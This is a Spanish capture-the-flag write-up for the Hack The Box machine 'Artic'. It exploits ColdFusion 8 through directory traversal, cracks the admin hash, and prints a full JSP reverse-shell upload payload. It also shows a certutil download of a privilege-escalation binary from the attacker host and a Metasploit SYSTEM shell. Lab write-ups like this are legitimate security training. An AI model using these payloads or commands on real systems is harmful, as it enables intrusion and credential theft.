Artic
Artic
Artic Windows · Easy - Adventure mode
🔭 Reconocimiento:
1
2
3
4
5
6
7
8
9
10
┌──(pmartinezr㉿kali)-[~/htb/artic]
└─$ nmap -p- -sSVC --min-rate 5000 10.129.7.67
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-12 11:09 +0100
Nmap scan report for 10.129.7.67
Host is up (0.045s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
8500/tcp open http JRun Web Server
49154/tcp open msrpc Microsoft Windows RPC
La web muestra unos directorios y archivos, los cuales entendí que debíamos explorar
Mucha información expuesta, quizás no es la mejor idea.
Por ejemplo tenemos información sobre la tecnología de base de datos.
Al acceder a la ruta CFIDE/probe.cfmnos muestra Información sobre que tecnología está basada la web.
💣 Preparación:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
┌──(pmartinezr㉿kali)-[~/htb/artic]
└─$ searchsploit coldfusion
------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------- ---------------------------------
Adobe ColdFusion - 'probe.cfm' Cross-Site Scripting | cfm/webapps/36067.txt
Adobe ColdFusion - Directory Traversal | multiple/remote/14641.py
Adobe ColdFusion - Directory Traversal (Metasploit) | multiple/remote/16985.rb
Adobe ColdFusion 11 - LDAP Java Object Deserialization Remode Code Execution (RCE) | windows/remote/50781.txt
Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code Executio | windows/remote/43993.py
Adobe ColdFusion 2018 - Arbitrary File Upload | multiple/webapps/45979.txt
Adobe ColdFusion 2023.6 - Remote File Read | multiple/webapps/52387.py
Adobe ColdFusion 6/7 - User_Agent Error Page Cross-Site Scripting | cfm/webapps/29567.txt
Adobe ColdFusion 7 - Multiple Cross-Site Scripting Vulnerabilities | cfm/webapps/36172.txt
Adobe ColdFusion 8 - Remote Command Execution (RCE) | cfm/webapps/50057.py
Adobe ColdFusion 9 - Administrative Authentication Bypass | windows/webapps/27755.txt
Adobe ColdFusion 9 - Administrative Authentication Bypass (Metasploit) | multiple/remote/30210.rb
Adobe ColdFusion < 11 Update 10 - XML External Entity Injection | multiple/webapps/40346.py
Adobe ColdFusion APSB13-03 - Remote Multiple Vulnerabilities (Metasploit) | multiple/remote/24946.rb
Adobe ColdFusion Server 8.0.1 - '/administrator/enter.cfm' Query String Cross-Site Scripti | cfm/webapps/33170.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_authenticatewizarduser.cfm' Query String | cfm/webapps/33167.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_logintowizard.cfm' Query String Cross-Si | cfm/webapps/33169.txt
Adobe ColdFusion Server 8.0.1 - 'administrator/logviewer/searchlog.cfm?startRow' Cross-Sit | cfm/webapps/33168.txt
Adobe ColdFusion versions 2018_15 (and earlier) and 2021_5 and earlier - Arbitrary File Re | multiple/webapps/51875.py
Allaire ColdFusion Server 4.0 - Remote File Display / Deletion / Upload / Execution | multiple/remote/19093.txt
Allaire ColdFusion Server 4.0.1 - 'CFCRYPT.EXE' Decrypt Pages | windows/local/19220.c
Allaire ColdFusion Server 4.0/4.0.1 - 'CFCACHE' Information Disclosure | multiple/remote/19712.txt
ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit) | cfm/webapps/16788.rb
ColdFusion 9-10 - Credential Disclosure | multiple/webapps/25305.py
ColdFusion MX - Missing Template Cross-Site Scripting | cfm/remote/21548.txt
ColdFusion MX - Remote Development Service | windows/remote/50.pl
ColdFusion Scripts Red_Reservations - Database Disclosure | asp/webapps/7440.txt
ColdFusion Server 2.0/3.x/4.x - Administrator Login Password Denial of Service | multiple/dos/19996.txt
Macromedia ColdFusion MX 6.0 - Error Message Full Path Disclosure | cfm/webapps/22544.txt
Macromedia ColdFusion MX 6.0 - Oversized Error Message Denial of Service | multiple/dos/24013.txt
Macromedia ColdFusion MX 6.0 - Remote Development Service File Disclosure | multiple/remote/22867.pl
Macromedia ColdFusion MX 6.0 - SQL Error Message Cross-Site Scripting | cfm/webapps/23256.txt
Macromedia ColdFusion MX 6.1 - Template Handling Privilege Escalation | multiple/remote/24654.txt
------------------------------------------------------------------------------------------- ---------------------------------
searchsploit -m multiple/remote/14641.py
Exploit: Adobe ColdFusion - Directory Traversal
URL: https://www.exploit-db.com/exploits/14641
Path: /usr/share/exploitdb/exploits/multiple/remote/14641.py
Codes: CVE-2010-2861, OSVDB-67047
Verified: True
File Type: HTML document, ASCII text
Copied to: /home/pmartinezr/htb/artic/14641.py
Hay un montón de exploits posibles para Coldfusion supongo que lo más complicado era encontrar uno que funcionase
👽 Acciones:
1
2
3
4
5
┌──(pmartinezr㉿kali)-[~/htb/artic]
└─$ python2 14641.py 10.129.7.67 8500
usage: 14641.py <host> <port> <file_path>
example: 14641.py localhost 80 ../../../../../../../lib/password.properties
if successful, the file will be printed
Pues simplemente copiamos la ruta del comando de ejemplo y ejecutamos
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
┌──(pmartinezr㉿kali)-[~/htb/artic]
└─$ python2 14641.py 10.129.7.67 8500 ../../../../../../../lib/password.properties
------------------------------
trying /CFIDE/wizards/common/_logintowizard.cfm
title from server in /CFIDE/wizards/common/_logintowizard.cfm:
------------------------------
#Wed Mar 22 20:53:51 EET 2017
rdspassword=0IA/F[[E>[$_6& \\Q>[K\=XP
password=2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03
encrypted=true
------------------------------
------------------------------
trying /CFIDE/administrator/archives/index.cfm
title from server in /CFIDE/administrator/archives/index.cfm:
------------------------------
#Wed Mar 22 20:53:51 EET 2017
rdspassword=0IA/F[[E>[$_6& \\Q>[K\=XP
password=2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03
encrypted=true
------------------------------
------------------------------
trying /cfide/install.cfm
title from server in /cfide/install.cfm:
------------------------------
#Wed Mar 22 20:53:51 EET 2017
rdspassword=0IA/F[[E>[$_6& \\Q>[K\=XP
password=2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03
encrypted=true
------------------------------
------------------------------
trying /CFIDE/administrator/entman/index.cfm
title from server in /CFIDE/administrator/entman/index.cfm:
------------------------------
#Wed Mar 22 20:53:51 EET 2017
rdspassword=0IA/F[[E>[$_6& \\Q>[K\=XP
password=2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03
encrypted=true
------------------------------
------------------------------
trying /CFIDE/administrator/enter.cfm
title from server in /CFIDE/administrator/enter.cfm:
------------------------------
#Wed Mar 22 20:53:51 EET 2017
rdspassword=0IA/F[[E>[$_6& \\Q>[K\=XP
password=2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03
encrypted=true
------------------------------
Al ejecutar este exploit se revela una password en SHA-1 2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03
1
2
hashcat -m 100 "2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03" /usr/share/wordlists/rockyou.txt
2f635f6d20e3fde0c53075a84b68fb07dcec9b03:happyday
Con Hascat sacamos la primera password, esto nos permite entrar al panel y seguir explorando
Podemos acceder como usuario administrador.
Exploré alguna de las configuraciones suponiendo que debe haber alguna forma de explotar la aplicación manipulando opciones
Se me ocurrió crear una tarea ejecutando un payload creado apuntando a Kali a través de una URL, sin embargo no funcionó, aunque supongo que se puede hacer así.
💣 Preparación:
La forma más sencilla de explotar la aplicación fue con el siguiente exploit https://www.exploit-db.com/exploits/50057
👽 Acciones:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
┌──(pmartinezr㉿kali)-[~/htb/artic]
└─$ python 50057.py
Generating a payload...
Payload size: 1498 bytes
Saved as: 3bf7e8d10bbc450db38a209b675d8cad.jsp
Priting request...
Content-type: multipart/form-data; boundary=763a6805936e428f8d1b4921c935858c
Content-length: 1699
--763a6805936e428f8d1b4921c935858c
Content-Disposition: form-data; name="newfile"; filename="3bf7e8d10bbc450db38a209b675d8cad.txt"
Content-Type: text/plain
<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>
<%
class StreamConnector extends Thread
{
InputStream kL;
OutputStream zV;
StreamConnector( InputStream kL, OutputStream zV )
{
this.kL = kL;
this.zV = zV;
}
public void run()
{
BufferedReader ja = null;
BufferedWriter hkC = null;
try
{
ja = new BufferedReader( new InputStreamReader( this.kL ) );
hkC = new BufferedWriter( new OutputStreamWriter( this.zV ) );
char buffer[] = new char[8192];
int length;
while( ( length = ja.read( buffer, 0, buffer.length ) ) > 0 )
{
hkC.write( buffer, 0, length );
hkC.flush();
}
} catch( Exception e ){}
try
{
if( ja != null )
ja.close();
if( hkC != null )
hkC.close();
} catch( Exception e ){}
}
}
try
{
String ShellPath;
if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
ShellPath = new String("/bin/sh");
} else {
ShellPath = new String("cmd.exe");
}
Socket socket = new Socket( "10.10.14.154", 4444 );
Process process = Runtime.getRuntime().exec( ShellPath );
( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
} catch( Exception e ) {}
%>
--763a6805936e428f8d1b4921c935858c--
Sending request and printing response...
<script type="text/javascript">
window.parent.OnUploadCompleted( 0, "/userfiles/file/3bf7e8d10bbc450db38a209b675d8cad.jsp/3bf7e8d10bbc450db38a209b675d8cad.txt", "3bf7e8d10bbc450db38a209b675d8cad.txt", "0" );
</script>
Printing some information for debugging...
lhost: 10.10.14.154
lport: 4444
rhost: 10.129.7.67
rport: 8500
payload: 3bf7e8d10bbc450db38a209b675d8cad.jsp
Deleting the payload...
Listening for connection...
Executing the payload...
listening on [any] 4444 ...
connect to [10.10.14.154] from (UNKNOWN) [10.129.7.67] 52041
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\ColdFusion8\runtime\bin>
c:\Users\tolis\Desktop>type user.txt
type user.txt
1a4fb5b047295abe*******
certutil -urlcache -split -f http://10.10.14.154/Chimichurri.exe
c:\Users\tolis>.\Chimichurri.exe 10.10.14.154 5555
.\Chimichurri.exe 10.10.14.154 5555
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Changing registry values...<BR>/Chimichurri/-->Got SYSTEM token...<BR>/Chimichurri/-->Running reverse shell...<BR>/Chimichurri/-->Restoring default registry values...<BR>
c:\Users\tolis>whoami
whoami
arctic\tolis
Obtenemos la primera bandera de usuario. Y de paso ejecutamos una escalada con el binario Chimichurri.exe
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
msf exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.10.14.154:5555
[*] Command shell session 1 opened (10.10.14.154:5555 -> 10.129.7.67:52193) at 2026-03-12 23:36:30 +0100
Shell Banner:
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\Users\tolis>
-----
c:\Users\tolis>whoami
whoami
nt authority\system
Recogemos la shell en Kali y somos nt authority\system, por lo tanto podemos hacer lo que queramos como leer la flag c:\users\administrator\root.txt`
Esta entrada está licenciada bajo CC BY 4.0 por el autor.